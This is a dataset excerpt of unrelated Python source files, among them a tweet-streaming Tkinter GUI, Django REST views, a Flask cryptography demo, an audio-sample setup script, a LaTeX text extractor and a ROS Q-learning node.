best_F = F\n best_epoch = iter\n torch.save(encoder.state_dict(),'models/'+args.log_dir+'_encoder.pt',pickle_protocol=3)\n torch.save(decoder.state_dict(),'models/'+args.log_dir+'_decoder.pt',pickle_protocol=3)\n encoder.load_state_dict(torch.load('models/'+args.log_dir+'_encoder.pt'))\n decoder.load_state_dict(torch.load('models/'+args.log_dir+'_decoder.pt'))\n\n precision, recall ,F = evaluate_all(args, dev_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n print('Precision %.3f, recall %.3f, F %.3f'%(precision*100, recall*100, F*100))\n test_precision, test_recall ,test_F = evaluate_all(args, test_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n text_precision, text_recall ,text_F = evaluate_all(args, test_data_text, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=True)\n print('test precision %.3f, recall %.3f, F value %.3f'%(test_precision*100, test_recall*100, test_F*100))\n print('text precision %.3f, recall %.3f, F value %.3f'%(text_precision*100, text_recall*100, text_F*100))\n sys.stdout.flush()\n\nif __name__ == '__main__':\n args = seq2seq_weak.parse_args()\n if use_cuda: torch.cuda.set_device(args.gpu)\n data, test_data_text, med_lang, cure_lang = pickle.load(open('../dataset/prescription_pairs_data.pkl','rb'))\n encoder = Encoder(voc_size=len(cure_lang.word2id), emb_size=args.emb_size, hidden_size=args.hidden_size, bidirectional=args.bidirectional)\n decoder = Decoder(args=args, voc_size=len(med_lang.word2id), hidden_size=args.hidden_size, emb_size=args.emb_size, bidirectional=args.bidirectional)\n encoder.load_emb(cure_lang.emb)\n if use_cuda:\n encoder.cuda()\n decoder.cuda()\n random.seed(255)\n random.shuffle(data)\n train_data = data[:int(len(data)*0.9)]\n dev_data = data[int(len(data)*0.9):int(len(data)*0.95)]\n test_data = data[int(len(data)*0.95):]\n batches = seq2seq_weak.make_batches(train_data, args.batch_size,med_lang)\n train_iters(args,encoder, decoder, batches, dev_data, test_data, test_data_text, args.epoch_num, tgt_lang=med_lang, src_lang=cure_lang)\n","sub_path":"multi_label.py","file_name":"multi_label.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"427094050","text":"from tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy import Stream\r\nfrom tweepy import Cursor\r\nfrom tweepy import API\r\nimport conf\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport json\r\nimport tkinter as tk\r\nimport sys\r\nimport os\r\n#initialisations de nos variables\r\nTWITTER_COLOR = '#00acee'\r\nbuttonPressed = False\r\nnumTweets = 0#initialisation du nombre tweets\r\nelapsedTime = 0\r\nfinalTime = 0#initialisation\r\nseconds = 1\r\nyTweets = []\r\nxSeconds = []\r\ngraphfont = {'family': 'Lucida Console',\r\n 'color': TWITTER_COLOR,\r\n 'weight': 'normal',\r\n 'size': 16,\r\n }#definir le style d'interface\r\n\r\n#obtenir nos clés et nos jetons\r\nconsumer_key = conf.consumer_key\r\nconsumer_secret = conf.consumer_secret\r\naccess_token = conf.access_token\r\naccess_token_secret = conf.access_token_secret\r\n\r\nclass Client():#creation de client de l'API tweepy\r\n def __init__(self, user=None):\r\n self.auth = Authenticator().Authenticate()\r\n self.client = API(self.auth)\r\n self.user = user\r\n\r\n def getClient(self):\r\n return self.client\r\n\r\n\r\nclass Authenticator():\r\n def Authenticate(self):\r\n auth = OAuthHandler(consumer_key, consumer_secret) # créer un objet OAuthHandler\r\n auth.set_access_token(access_token, access_token_secret) # définir le jeton d'accès et le secret\r\n return auth\r\n\r\n\r\nclass TweetViewer():\r\n \"\"\"\r\n Proccess Live Tweets\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.authenticator = Authenticator()#crée une instance de la Class Authenticator\r\n\r\n def FetchTweets(self, filename, filter):\r\n listener = Listener(filename)#crée une instance de la Class Listener\r\n auth = self.authenticator.Authenticate()\r\n stream = Stream(auth, listener)\r\n global topics\r\n stream.filter(track=topics, is_async=True, languages=['en'])#la langue des tweets\r\n global buttonPressed\r\n if (buttonPressed == True):\r\n stream.filter.track\\\r\n = None\r\n stream.disconnect()\r\n stream = None\r\n # topics[0] = ''\r\n\r\n\r\nclass Listener(StreamListener):\r\n \"\"\"\r\n Prints tweet contents\r\n \"\"\"\r\n\r\n def __init__(self, filename):\r\n self.filename = filename\r\n\r\n def on_data(self, data):\r\n try:\r\n global buttonPressed\r\n if buttonPressed == False and len(topics) > 0:#on grade les memes valeurs des variable si on ne clique pas sur 'buttonPressed'\r\n global elapsedTime\r\n global finalTime\r\n global seconds\r\n global numTweets\r\n yTweets.append(numTweets)\r\n xSeconds.append((time.time() - elapsedTime))\r\n # seconds += seconds\r\n d = json.loads(data)\r\n # print(\"Topic is: \", topics, \"buttonPressed is: \", buttonPressed)\r\n formatted = convert65536('@' + d['user']['screen_name'] + \": \" + d['text'])\r\n text.insert(tk.END, formatted)\r\n text.insert(tk.END, \"\\n\\n\")\r\n text.see(tk.END)\r\n numTweets = numTweets + 1\r\n numTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets), bg='black', fg=TWITTER_COLOR, font=40)\r\n return True\r\n else:\r\n return True\r\n except BaseException as e:\r\n print(\"Error on_data: %s\" % str(e))\r\n # print(data)\r\n return True\r\n\r\n def on_error(self, status):#traitement d'erreur '420'\r\n if status == 420:\r\n return False\r\n print(status)\r\n return True\r\n\r\n\r\n# traitement des emojis et autres personnages non unicode qui peuvent apparaître dans les tweets\r\ndef convert65536(s): #######################################\r\n l = list(s); #\r\n i = 0; #\r\n while i < len(l): #\r\n o = ord(l[i]); # https://stackoverflow.com/a/28076205\r\n if o > 65535: #\r\n l[i] = \"{\" + str(o) + \"u}\"; #\r\n i += 1; #\r\n return \"\".join(l); ########################################\r\n\r\n\r\nfirstPress = True\r\n\r\n\r\ndef onButtonPress():\r\n global buttonPressed#mettre a jour les variable\r\n global Viewer\r\n global topics\r\n global file\r\n global elapsedTime\r\n global firstPress\r\n if firstPress == True:\r\n elapsedTime = time.time()#counter le temps passe pour touver et affiche les tweets\r\n firstPress = False\r\n buttonPressed = True\r\n topics.insert(0, TextBox.get())#\r\n topicsLabel.configure(text=\"Current Topics:\\n {0}\".format(printTopicsListVertical(topics)), bg='black',\r\n fg=TWITTER_COLOR, font=40, anchor='n', bd=10)#sauvegarder les mot clé utilisées\r\n\r\n if (len(topics) > 0):#afficher les tweets\r\n buttonPressed = False\r\n Viewer.FetchTweets(file, topics)#REcupérer le fichier json et afficher son contenue\r\n\r\n\r\n\r\ndef onResetButtonPress():#fonction pour remise a l'etat intial\r\n global finalTime\r\n global elapsedTime\r\n finalTime = time.time() - elapsedTime\r\n print(finalTime)\r\n\r\n global buttonPressed\r\n buttonPressed = True\r\n global numTweets\r\n numTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets))\r\n graph()\r\n numTweets = 0\r\n\r\n\r\ndef onExitButtonPress():#boutton quitter\r\n root.destroy()\r\n sys.exit(0)\r\n\r\n\r\ndef printTopicsList(topics):#zone de recherche\r\n if len(topics) == 1:\r\n return topics[0]\r\n\r\n s = \", \".join(topics)\r\n return s\r\n\r\n\r\ndef printTopicsListVertical(topics):#list de mot cle sauvgardé\r\n if len(topics) == 1:\r\n return topics[0]\r\n\r\n s = \"\\n\".join(topics)\r\n return s\r\n\r\n\r\ndef graph():#affiche le graph\r\n global elapsedTime\r\n global finalTime\r\n plt.xlabel('time (sec)', fontdict=graphfont)\r\n plt.ylabel('Tweets', fontdict=graphfont)\r\n plt.title('Number of Tweets about {0} over {1} seconds'.format(printTopicsList(topics), int(finalTime + 1.0)),\r\n fontdict=graphfont)\r\n plt.plot(xSeconds, yTweets, TWITTER_COLOR)\r\n plt.show()\r\n\r\n\r\ntopics = []\r\nfile = \"tweets.json\"#creation d'un fichier json\r\nViewer = TweetViewer()\r\n\r\nmyClient = Client()\r\napi = myClient.getClient()\r\ntweets = api.user_timeline(screen_name=\"realDonaldTrump\", count=10)\r\n\r\nmandotweets = []\r\nHEIGHT = 720\r\nWIDTH = 1280\r\n# appel de la fonction principale\r\nroot = tk.Tk()#créer un interface graphique\r\nroot.title(\"LiveTweets\")#titre de l'interface\r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\r\ncanvas.pack() #Positionnement du widget avec la methode pack()\r\n\r\nbackground = tk.PhotoImage(file='background.png')#inserer image au fond\r\nbgLabel = tk.Label(root, image=background)\r\nbgLabel.place(relwidth=1, relheight=1)\r\n\r\nframe = tk.Frame(root, bg=TWITTER_COLOR, bd=5)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor='n')\r\n#affichage du texbox\r\nTextBox = tk.Entry(frame, bg='white', font=200)\r\nTextBox.bind(\"\", (lambda event: onButtonPress()))\r\nTextBox.place(relwidth=0.65, relheight=1)\r\n\r\nbutton = tk.Button(frame, text=\"Add Topic to Live Feed\", bg='#00acee', fg='white', font=40, command=onButtonPress)\r\nbutton.place(relx=0.6, relheight=1, relwidth=0.29)\r\n\r\nstopButton = tk.Button(frame, text=\"Graph Tweets/\\nStop Feed\", bg='#000080', fg='white', font=40,\r\n command=onResetButtonPress, borderwidth=3, relief=\"raised\")\r\nstopButton.place(relx=0.88, relheight=1, relwidth=0.12)\r\n\r\nexitButton = tk.Button(root, text=\"Exit\", bg=TWITTER_COLOR, fg='white', font=80, command=onExitButtonPress,\r\n borderwidth=3, relief=\"raised\")\r\nexitButton.place(relheight=0.1, relwidth=0.1, relx=0.45, rely=0.85)\r\n\r\nnumTweetsLabel = tk.Label(root, text=\"Tweets: {0}\".format(numTweets), borderwidth=3, relief=\"ridge\")\r\nnumTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets), bg='black', fg=TWITTER_COLOR, font=40)\r\nnumTweetsLabel.place(relheight=0.1, relwidth=0.15, relx=0.6, rely=0.85)\r\n\r\ntopicsLabel = tk.Label(root, text=\"Current Topics:\\n {0}\".format(printTopicsList(topics)), borderwidth=3,\r\n relief=\"ridge\")\r\ntopicsLabel.configure(text=\"Current Topics:\\n {0}\".format(printTopicsList(topics)), bg='black', fg=TWITTER_COLOR,\r\n font=40, anchor='n', bd=10)\r\ntopicsLabel.place(relheight=0.6, relwidth=0.12, relx=0.004, rely=0.25)\r\n\r\nframe2 = tk.Frame(root, bg=TWITTER_COLOR, bd=10)\r\nframe2.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor='n')\r\n\r\ntext = tk.Text(frame2)\r\ntext.config(state='normal')\r\ntext.config(font=(\"Lucida\"))\r\ntext.place(relwidth=1, relheight=1)\r\n\r\n# text.insert(tk.END, convert65536(str(TheTweets)))\r\nroot.mainloop()\r\n# END OF GUI LOOP","sub_path":"twitter2.py","file_name":"twitter2.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"276787964","text":"from rest_framework.parsers import JSONParser\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\nfrom games.models import Game\r\nfrom games.serializers import GameSerializer\r\nfrom datetime import datetime\r\nfrom django.utils import timezone\r\n\r\n@api_view(['GET', 'POST'])\r\ndef game_list(request):\r\n\r\n\tif request.method == 'GET':\r\n\r\n\t\tgames = Game.objects.all()\r\n\t\tgames_serializer = GameSerializer(games, many=True)\r\n\t\treturn Response(games_serializer.data)\r\n\r\n\telif request.method == 'POST':\r\n\r\n\t\tgame_serializer = GameSerializer(data=request.data)\r\n\t\tif game_serializer.is_valid(request):\r\n\t\t\tgame_serializer.save()\r\n\t\t\treturn Response(game_serializer.data, status=status.HTTP_201_CREATED)\r\n\t\treturn Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\ndef game_detail(request, pk):\r\n\r\n\ttry:\r\n\t\tgame = Game.objects.get(pk=pk)\r\n\texcept Game.DoesNotExist:\r\n\t\treturn Response(status=status.HTTP_404_NOT_FOUND)\r\n\t\r\n\tif request.method == 'GET':\r\n\r\n\t\tgame_serializer = GameSerializer(game)\r\n\t\treturn Response(game_serializer.data)\r\n\r\n\telif request.method == 'PUT':\r\n\r\n\t\tgame_serializer = GameSerializer(game, data=request.data)\r\n\r\n\t\tif game_serializer.is_valid(request):\r\n\t\t\tgame_serializer.save()\r\n\t\t\treturn Response(game_serializer.data)\r\n\r\n\t\treturn Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\telif request.method == 'DELETE':\r\n\r\n\t\ttodays_date = timezone.make_aware(datetime.now(), timezone.get_current_timezone())\r\n\r\n\t\tif todays_date < game.release_date:\r\n\t\t\tgame.delete()\r\n\t\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\r\n\t\telse:\r\n\t\t\treturn Response({\"msg\" : \"This game was launched already!\"}, status=status.HTTP_412_PRECONDITION_FAILED)\r\n\r\n\r\n\r\n\r\n","sub_path":"gamesapi/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"207409103","text":"from flask import Flask, render_template, request\nfrom Crypto_Examples.DES import run_des\nfrom Crypto_Examples.AES import AES\nfrom Crypto_Examples.RSA import RSA\nfrom Crypto_Examples.MD5 import MD5\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n\ndef is_hex(string):\n \"\"\"Check if entered value is hex:\"\"\"\n try:\n int(string, 16)\n return True\n except ValueError:\n return False\n\n\n\ndef get_hex(text):\n \"\"\"Get hex value from entered string\"\"\"\n text_byte_array = list(map(bin, bytearray(text, encoding='utf-8')))\n text_byte_array_string = ''.join([foo[2:] for foo in text_byte_array])\n return str(hex(int(text_byte_array_string, 2))[2:].upper())\n\n\ndef get_hex_array(string):\n return [int(string[i:i + 2], 16) for i in range(0, len(string), 2)]\n\n\ndef fixed_len_hex(string):\n return '{0:#034x}'.format(int(string, 16))[2:]\n\n\n@app.route('/')\ndef load_home_page():\n \"\"\"Display Home page:\"\"\"\n return render_template('index.html')\n\n\n@app.route('/des/', methods=['POST', 'GET'])\ndef des_page():\n \"\"\"Display data from DES calculations:\"\"\"\n if request.method == 'POST':\n message = request.form['message']\n key = request.form['key']\n\n # Errors:\n # 1 - empty message or key field\n # 2- key is not hex value\n\n if message or key is not None:\n\n if not is_hex(key):\n return render_template('page_des.html', error_no='2')\n else:\n errors = list()\n if not is_hex(message):\n message = get_hex(message)\n errors.append('Message was not hex so it was converted to hex value which is: {}'.format(message))\n if len(key) > 16:\n key = key[:16]\n errors.append('Key was longer than 16 symbols, it was shortened to: {}'.format(key))\n # Check if there are errors:\n errors = None if len(errors) == 0 else errors\n action = request.form['action_options']\n print(action)\n if action == 'encrypt':\n encryption_values = run_des(message, key, action)\n return render_template('page_des.html',\n print_action=action,\n message=message,\n key=key,\n encryption_values=encryption_values,\n errors=errors)\n elif action == 'decrypt':\n decryption_values = run_des(message, key, action)\n return render_template('page_des.html',\n print_action=action,\n message=message,\n key=key,\n decryption_values=decryption_values,\n errors=errors)\n else:\n encryption_values = run_des(message, key, 'encrypt')\n decryption_values = run_des(encryption_values['Cipher'], key, 'decrypt')\n return render_template('page_des.html',\n print_action='both',\n message=message,\n key=key,\n encryption_values=encryption_values,\n decryption_values=decryption_values,\n errors=errors)\n else:\n return render_template('page_des.html', error_no='1')\n else:\n return render_template('page_des.html')\n\n\n\n@app.route('/aes/', methods=['POST', 'GET'])\ndef aes_page():\n \"\"\"Display data from AES calculations:\"\"\"\n if request.method == 'POST':\n message = request.form['message']\n key = request.form['key']\n\n # Errors:\n # 1 - empty message or key field\n # 2 - key is not hex value\n # 3 - message is not hex value\n\n if message or key is not None:\n\n if not is_hex(key):\n return render_template('page_aes.html', error_no='2')\n elif not is_hex(message):\n return render_template('page_aes.html', error_no='3')\n else:\n message = fixed_len_hex(message)\n key = fixed_len_hex(key)\n aes = AES()\n aes_data = aes.do_rounds(message=get_hex_array(message), key=get_hex_array(key))\n return render_template('page_aes.html', message=message, key=key, data=aes_data)\n else:\n return render_template('page_aes.html', error_no='1')\n else:\n return render_template('page_aes.html')\n\n\n\n@app.route('/rsa/', methods=['POST', 'GET'])\ndef rsa_page():\n \"\"\"Display data from DES calculations:\"\"\"\n if request.method == 'POST':\n message = int(request.form['message'])\n e = int(request.form['e'])\n p = int(request.form['p'])\n q = int(request.form['q'])\n\n # Errors:\n # 1 - empty value\n # 2 - numbers are not prime\n # 3 - e is not relatively prime to (p-1)*(q-1)\n\n if message and e and p and q is not None:\n rsa = RSA()\n # Check for primeness and relative primeness:\n if not rsa.is_prime(p): # is_hex(e):\n return render_template('page_rsa.html', error_no='2', number=p)\n elif not rsa.is_prime(q):\n return render_template('page_rsa.html', error_no='2', number=q)\n else:\n if not rsa.is_relatively_prime(e, (p - 1) * (q - 1)):\n return render_template('page_rsa.html', error_no='3', number=e)\n else:\n action = request.form['action_options']\n print(action)\n\n return render_template('page_rsa.html', message=message, p=p, q=q, e=e,\n rsa=rsa.do_rsa(message, p, q, e, action))\n else:\n return render_template('page_rsa.html', error_no='1')\n else:\n return render_template('page_rsa.html')\n\n\n@app.route('/md5/', methods=['POST', 'GET'])\ndef md5_page():\n if request.method == 'POST':\n message = request.form['message']\n action = request.form['action_options']\n\n # Errors:\n # 1 - empty value\n\n # if message is not None:\n hash = MD5().get_md5_hash(message)\n if action == 'all_steps':\n return render_template('page_md5.html', message=message, hash=hash['hash'], show_all=True,\n operations_data=hash)\n else:\n return render_template('page_md5.html', message=message, hash=hash['hash'])\n\n # else:\n # return render_template('page_md5.html', error_no='1')\n else:\n return render_template('page_md5.html')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"519214128","text":"\"\"\"\nThis script is to set up the fingerprints database. In details,\n1. download word samples from internet.\n2. calculate the fingerprints of each sample and insert them into db.\n\"\"\"\n\nimport urllib.request\nimport sys\nfrom audio_fingerprinting import insert_file\n\nsamples = [\n\t'audio',\n\t'impossible',\n\t'you'\n]\n\nwav_folder_name = 'audio_samples/wav/'\nmp3_folder_name = 'audio_samples/mp3/'\n\nif len(sys.argv) < 2:\n\tprint('Usage:')\n\tprint('1. Download mp3 file')\n\tprint(' python setup.py --download')\n\tprint('2. Insert the converted wav files in to db')\n\tprint(' python setup.py --insert')\n\t\nelif sys.argv[1] == '--download':\n\tfor word in samples:\n\t\tfn = word+'.mp3'\n\t\turl = 'https://ssl.gstatic.com/dictionary/static/sounds/de/0/'+fn\n\t\turllib.request.urlretrieve(url, mp3_folder_name + fn)\n\nelif sys.argv[1] == '--insert':\n\tfor word in samples:\n\t\tfn = word + '.wav'\n\t\tpn = wav_folder_name + fn\n\t\tinsert_file(pn, word)\n\nelse:\n\tprint('Usage:')\n\tprint('1. Download mp3 file')\n\tprint(' python setup.py --download')\n\tprint('2. Insert the converted wav files in to db')\n\tprint(' python setup.py --insert')\n\t\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"84748747","text":"'''\ninheritance\n'''\n# class introduce:\n\n# def say_hello(self):\n# print('hello, ')\n\n# class occupation(introduce):\n# def __init__(self,name , occu):\n# self.occu = occu\n# self.name = name\n \n# def say_occu(self):\n# print('My name is {}, Im {}.'.format(self.name, self.occu))\n\n# son = occupation('Son', 'Graduate Student')\n# son.say_hello()\n# son.say_occu()\n\n\n'''\noverride\n'''\n# class Country:\n# \"\"\"Super Class\"\"\"\n\n# name = '국가명'\n# population = '인구'\n# capital = '수도'\n\n# def show(self):\n# print('국가 클래스의 메소드입니다.')\n\n# class Korea(Country):\n# \"\"\"Sub Class\"\"\"\n\n# def __init__(self, name,population, capital):\n# self.name = name\n# self.population = population\n# self.capital = capital\n\n# def show(self):\n# super().show()\n# print(\n# \"\"\"\n# 국가의 이름은 {} 입니다.\n# 국가의 인구는 {} 입니다.\n# 국가의 수도는 {} 입니다.\n# \"\"\".format(self.name, self.population, self.capital)\n# )\n\n# Kor = Korea(\"대한민국\", \"5,182만1669명\", \"서울\")\n# Kor.show()\n\nclass Parent:\n def __init__(self, p1, p2):\n self.p1 = p1\n self.p2 = p2\n \nclass Child(Parent):\n def __init__(self, c1, **kwargs):\n super(Child, self).__init__(**kwargs) # super()를 사용하지 않으면 Parent의 __init__가 overriding 됩니다.\n self.c1 = c1\n self.c2 = \"This is Child's c2\"\n self.c3 = \"This is Child's c3\"\n\nchild = Child(p1=\"This is Parent's p1\", \n\t p2=\"This is Parent's p1\", \n c1=\"This is Child's c1\")\n\nprint(child.p1)\nprint(child.p2)\nprint(child.c1)\nprint(child.c2)\nprint(child.c3)","sub_path":"for_testing/heritance_override_super.py","file_name":"heritance_override_super.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"275362228","text":"import re\n\nblack_list = [\n\t\"\\\\documentclass\",\n\t\"\\\\usepackage\",\n\t\"\\\\title\",\n\t\"\\\\date\",\n\t\"\\\\begin{document}\",\n\t\"\\\\def\",\n\t\"\\\\newcommand\",\n\t\"\\\\tableofcontents\",\n\t\"\\\\end{document}\",\n\t\"\\\\begin{center}\",\n\t\"\\\\end{center}\",\n\t\"\\\\begin{flushright}\",\n\t\"\\\\end{flushright}\",\n\t\"\\\\vspace{30pt}\",\n\t\"\\\\vfill\",\n\t\"\\\\begin{itemize}\",\n\t\"\\\\end{itemize}\",\n\t\"\\\\bibliographystyle\",\n\t\"\\\\begin{thebibliography}\",\n\t\"\\\\bibitem\",\n\t\"\\\\end{thebibliography}\",\n\t\"\\\\newpage\",\n\t\"\\\\medskip\",\n\t\"\\\\vspace\",\n\t\"\\\\par\",\n\t\"\\\\bigskip\",\n\t\"\\\\addcontentsline\",\n\t\"%\"\n]\n\np1 = re.compile(\"input{(\\w+)}\")\np_refine = [\n\tre.compile(\"\\s*bf\\s*(.*)\\s*}\"),\n\tre.compile(\"item(.*)\"),\n\tre.compile(\"chapter{(.*)}\"),\n\tre.compile(\"section{(.*)}\"),\n\tre.compile(\"subsection{(.*)}\")\n]\n\ndef ok(line):\n\tfor bl in black_list:\n\t\tif line.startswith(bl):\n\t\t\treturn False\n\treturn True\n\ndef refine(line):\n\tresult = line\n\tr = False\n\tfor p in p_refine:\n\t\ts = p.search(result)\n\t\tif s != None:\n\t\t\tresult = s.group(1)\n\t\t\tr = True\n\tif r:\n\t\tresult += \"\\n\"\n\treturn result\n\ndef read_file(file_name):\n\tf = open(file_name, \"r\")\n\ttext = \"\"\n\tstatus = True\n\tfor line in f:\n\t\tif line.startswith(\"\\\\iffalse\"):\n\t\t\tstatus = False\n\t\telif line.startswith(\"\\\\fi\"):\n\t\t\tstatus = True\n\t\telse:\n\t\t\tif not status:\n\t\t\t\tcontinue\n\t\t\twhile (len(line) > 0) and (line[0] == \" \" or line[0] == \"\\t\"):\n\t\t\t\tline = line[1:]\n\t\t\tif line.startswith(\"\\\\input\"):\n\t\t\t\tm = p1.search(line)\n\t\t\t\tinput_file = m.group(1) + \".tex\"\n\t\t\t\tprint(input_file)\n\t\t\t\ttext += read_file(input_file)\n\t\t\telif ok(line):\n\t\t\t\ttext += refine(line)\n\tf.close()\n\treturn text\n\ndef write_file(file_name, text):\n\tf = open(file_name, \"wt\", encoding = \"utf-8\")\n\tf.write(text)\n\tf.close()\n\ndef process():\n\ttext = read_file(\"Abstract.tex\")\n\twrite_file(\"Abstract.txt\", text)\n\ndef test():\n\tp = re.compile(\"subsection{(.*)}\")\n\tr = p.search(\"subsection{Статистический метод TF-IDF}\")\n\tprint(r)\n\n#test()\nprocess()\n\n","sub_path":"LaTex/PhD/05.13.01/Abstract/Abstract.py","file_name":"Abstract.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"426994737","text":"#!/usr/bin/env python3\n\nimport rospy\nimport numpy as np\nimport os\nimport csv\nimport time\nfrom random import choice, randint\nfrom q_learning_project.msg import QMatrix, QMatrixRow\nfrom q_learning_project.msg import QLearningReward\nfrom q_learning_project.msg import RobotMoveDBToBlock\n\n# Path of directory on where this file is located\npath_prefix = os.path.dirname(__file__) + \"/action_states/\"\nt0 = time.time()\n\nclass QLearning(object):\n def __init__(self):\n # Initialize this node\n rospy.init_node(\"q_learning\")\n rospy.sleep(1)\n\n # Fetch pre-built action matrix. This is a 2d numpy array where row indexes\n # correspond to the starting state and column indexes are the next states.\n #\n # A value of -1 indicates that it is not possible to get to the next state\n # from the starting state. Values 0-9 correspond to what action is needed\n # to go to the next state.\n #\n # e.g. self.action_matrix[0][12] = 5\n self.action_matrix = np.loadtxt(path_prefix + \"action_matrix.txt\")\n\n # Fetch actions. These are the only 9 possible actions the system can take.\n # self.actions is an array of dictionaries where the row index corresponds\n # to the action number, and the value has the following form:\n # { dumbbell: \"red\", block: 1}\n colors = [\"red\", \"green\", \"blue\"]\n self.actions = np.loadtxt(path_prefix + \"actions.txt\")\n self.actions = list(map(\n lambda x: {\"dumbbell\": colors[int(x[0])], \"block\": int(x[1])},\n self.actions\n ))\n\n # Fetch states. There are 64 states. Each row index corresponds to the\n # state number, and the value is a list of 3 items indicating the positions\n # of the red, green, blue dumbbells respectively.\n # e.g. [[0, 0, 0], [1, 0 , 0], [2, 0, 0], ..., [3, 3, 3]]\n # e.g. [0, 1, 2] indicates that the green dumbbell is at block 1, and blue at block 2.\n # A value of 0 corresponds to the origin. 1/2/3 corresponds to the block number.\n # Note: that not all states are possible to get to.\n self.states = np.loadtxt(path_prefix + \"states.txt\")\n self.states = list(map(lambda x: list(map(lambda y: int(y), x)), self.states))\n\n # Initialize Q matrix\n self.qmatrix = QMatrix()\n self.qmatrix.q_matrix = [QMatrixRow(q_matrix_row = [0 for action in range(9)]) for state in range(64)]\n \n # publisher for QMatrix\n self.qmatrix_pub = rospy.Publisher(\"/q_learning/q_matrix\", QMatrix, queue_size=10)\n\n # subscribe to reward\n rospy.Subscriber(\"/q_learning/reward\", QLearningReward, self.update_q_matrix)\n rospy.sleep(1)\n\n # publisher for robot action\n self.robot_action_pub = rospy.Publisher(\"/q_learning/robot_action\", RobotMoveDBToBlock, queue_size=10)\n rospy.sleep(1)\n\n # initialize RobotMoveDBToBlock message\n self.robot_action = RobotMoveDBToBlock()\n\n # action performed at time t\n self.action = None\n\n # state at time t, initialized to the orginial state\n self.state = 0\n # state at time t+1\n self.next_state = None\n\n # learning rate\n self.alpha = 1\n # discount factor\n self.gamma = 0.8\n # count how long the values of Q matrix have stayed the same\n self.convergence_cnt = 0\n \n self.reward_received = True\n self.converged = False\n\n def perform_action(self): \n # wait till an reward is received\n if not self.reward_received:\n rospy.sleep(1)\n return\n\n # randomly select a valid action \n valid_actions = [x for x in self.action_matrix[self.state] if x > -1]\n\n # if no valid actions, return and wait the world to be reset\n if not valid_actions:\n # reset everything to the original state\n self.state = 0\n self.next_state = None\n self.action = None\n self.reward_received = True\n return\n\n action = choice(valid_actions)\n \n # update action at time t\n self.action = int(action)\n\n # update state at time t+1\n self.next_state = np.where(self.action_matrix[self.state] == action)[0][0]\n\n # perform action\n action = self.actions[self.action]\n self.robot_action.robot_db = action.get(\"dumbbell\")\n self.robot_action.block_id = action.get(\"block\")\n self.robot_action_pub.publish(self.robot_action)\n #print(action)\n\n self.reward_received = False\n return\n \n def update_q_matrix(self, data):\n self.reward_received = True\n\n # get current Q value given state and action\n q = self.qmatrix.q_matrix[self.state].q_matrix_row[self.action]\n\n # find maximum q value for the next state\n max_q = max(self.qmatrix.q_matrix[self.next_state].q_matrix_row)\n\n # calculate new Q value\n q_new = int(q + self.alpha*(data.reward + self.gamma*max_q - q))\n self.qmatrix.q_matrix[self.state].q_matrix_row[self.action] = q_new\n #print(q + self.alpha*(data.reward + self.gamma*max_q - q_t))\n # update current state\n self.state = self.next_state\n\n # publish Q matrix\n self.qmatrix_pub.publish(self.qmatrix)\n\n # check if the Q matrix has converged \n if q == q_new:\n self.convergence_cnt += 1\n else:\n self.convergence_cnt = 0\n\n if self.convergence_cnt == 50:\n print(\"self.convergence_cnt reached 50 at \"+str(time.time()-t0))\n if self.convergence_cnt == 100:\n print(\"self.convergence_cnt reached 100 at \"+str(time.time()-t0))\n if self.convergence_cnt == 150:\n print(\"self.convergence_cnt reached 150 at \"+str(time.time()-t0))\n\n # if the Q matrix has remained the same for 200 steps, then we consider it to be converged\n if self.convergence_cnt == 200:\n print(\"self.convergence_cnt reached 200 at \"+str(time.time()-t0))\n print(\"Q Matrix has converged! Training done!\")\n self.converged = True\n \n \"\"\"Save the q_matrix file to csv\"\"\"\n def save_q_matrix(self):\n with open('qmatrix.csv', 'w', newline='') as fp:\n writer = csv.writer(fp)\n for state in range(64):\n writer.writerow(self.qmatrix.q_matrix[state].q_matrix_row)\n return\n\n \"\"\"Run Q-Learning algorithm until convergence\"\"\"\n def run(self):\n while self.converged is False:\n self.perform_action()\n rospy.sleep(1)\n\n self.save_q_matrix()\n \nif __name__ == \"__main__\":\n node = QLearning()\n node.run()\n","sub_path":"scripts/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
